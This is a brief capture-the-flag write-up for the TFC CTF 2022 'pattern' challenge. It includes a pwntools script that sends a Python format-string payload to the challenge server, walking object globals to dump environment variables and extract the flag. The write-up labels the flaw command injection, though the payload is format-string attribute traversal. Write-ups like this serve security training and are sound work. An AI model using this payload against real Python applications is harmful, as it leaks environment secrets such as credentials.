pattern
This task was part of the TFC CTF 2022 competition.
This is a basic command injection challenge. Just review the provided source code, and you'll find that you need to exploit the message object of Message class.
The source code shows that the __repr__ method is being set to the same function as __str__. This means that when repr(message) or str(message) is called, it returns the message string. So you need to manipulate how the message string is processed.
from pwn import *
import re
# avoid warnings when you run the python code
import warnings
warnings.filterwarnings("ignore")
server_IP = "34.107.71.117"
server_port = 30840
# Open connection
connection = remote(server_IP,server_port)
# payload used to get the flag
payload = '{message.__class__.__init__.__globals__[os].environ}'
# send payload
connection.sendlineafter("pattern> ",payload)
connection.sendlineafter("count> ",'1')
# get response and print the output
response = connection.recvline()
#print(response.decode())
# Search for flag
flag = re.search(r'flag\{.*?\}', response.decode())
if flag:
print(f"Flag found: {flag.group(0)}")
else:
print("Flag not found.")
# close the connection
connection.close()Last updated